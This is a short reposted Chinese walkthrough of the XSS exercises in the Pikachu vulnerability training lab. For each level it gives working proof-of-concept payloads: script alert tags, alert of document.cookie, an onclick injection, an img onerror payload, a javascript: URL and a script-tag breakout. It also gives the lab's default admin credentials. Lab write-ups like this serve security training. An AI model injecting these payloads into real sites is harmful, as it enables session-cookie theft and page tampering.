gpt4 book ai didi

Pikachu漏洞靶场 XSS(跨站脚本攻击)

转载 作者:知者 更新时间:2024-03-13 02:39:22 27 4
gpt4 key购买 nike

XSS

关于xss的我也是一知半解,所以只放出payload来。

反射型xss(get)

修改maxlength属性之后提交如下内容:

<script>alert(/xss/);</script>
反射型xss(post)

登录之后提交如下内容:

<script>alert(document.cookie);</script>
存储型xss

提交如下内容:

<script>alert(/xss/);</script>
DOM型xss、xss-x

提交如下内容,鼠标点击a标签时就会弹窗。

#' οnclick=alert(/xss/)>
xss之盲打

在xss_blind.php提交如下内容:

<script>alert(/xss/);</script>

然后进入后台admin_login.php,admin,123456登录

进入后台就会弹窗。

xss之过滤

提交如下内容就会弹窗:

<img src=# onerror=alert(/xss/)>
XSS之htmlspecialchars、xss之href输出

提交如下内容,点击a标签就会弹窗:

javascript:alert(/xss/)
xss之js输出

提交如下内容闭合script标签即可弹窗:

</script><script>alert(/xss/)</script>

27 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com